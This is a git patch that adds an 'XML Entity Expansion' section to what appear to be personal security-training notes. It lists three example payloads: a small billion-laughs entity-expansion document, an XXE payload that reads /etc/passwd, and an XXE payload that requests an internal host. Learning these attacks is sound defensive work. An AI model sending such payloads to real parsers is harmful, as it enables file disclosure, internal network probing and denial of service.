From 4f7a44015d7bdfcefc27da63bd14e04b2562f516 Mon Sep 17 00:00:00 2001
From: Sander Hautvast <shautvast@gmail.com>
Date: Mon, 5 Feb 2024 13:42:43 +0100
Subject: [PATCH] Update sectraining.md

---
 sectraining.md | 44 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)

diff --git a/sectraining.md b/sectraining.md
index 82854ca..430807e 100644
--- a/sectraining.md
+++ b/sectraining.md
@@ -188,3 +188,47 @@ private static String fetchRemoteObject(String location) throws Exception {
     return body;
 }
 ```
+
+### XML Entity Expansion
+
+#### billion laughs attack
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?> 
+<!DOCTYPE foo [
+  <!ELEMENT foo ANY>
+  <!ENTITY bar "SecureFlag ">
+  <!ENTITY t1 "&bar;&bar;">
+  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
+  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
+]>
+<foo>
+  Join &t3;
+</foo>
+```
+
+#### forgery
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?> 
+<!DOCTYPE foo [
+  <!ELEMENT foo ANY>
+  <!ENTITY xxe SYSTEM
+  "file:///etc/passwd">
+]>
+<foo>
+  &xxe;
+</foo>
+```
+
+or 
+
+```xml
+<?xml version="1.0" encoding="ISO-8859-1"?> 
+<!DOCTYPE foo [
+  <!ELEMENT foo ANY>
+  <!ENTITY xxe SYSTEM
+  "http://internal.vulnerableapp.com:8443">
+]>
+<foo>
+  &xxe;
+</foo>
+```